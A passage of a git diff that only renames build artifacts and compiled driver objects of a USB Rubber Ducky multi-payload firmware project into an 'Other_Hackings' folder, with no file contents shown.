Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.eep diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.elf b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.elf similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.elf rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.elf diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.hex b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.hex similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.hex rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.hex diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.lss b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.lss similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.lss rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.lss diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.map b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.map similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.map rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.map diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/makedep.mk b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/makedep.mk similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/makedep.mk rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/makedep.mk diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/init.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/boards/evk1101/led.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/flashc/flashc.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/gpio/gpio.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/exception.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/exception.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/exception.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/exception.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/intc/intc.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/pm_conf_clocks.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/pm/power_clocks_lib.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/spi/spi.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/drivers/usbb/usbb_device.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/fat_unusual.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/file.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/services/fs/fat/navigation.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/startup_uc3.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/startup_uc3.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/startup_uc3.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/startup_uc3.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/trampoline_uc3.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/trampoline_uc3.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/trampoline_uc3.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/avr32/utils/startup/trampoline_uc3.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/clock/uc3b0_b1/sysclk.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/sleepmgr/uc3/sleepmgr.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/storage/ctrl_access/ctrl_access.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/class/hid/device/udi_hid.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.d similarity index 100% rename from 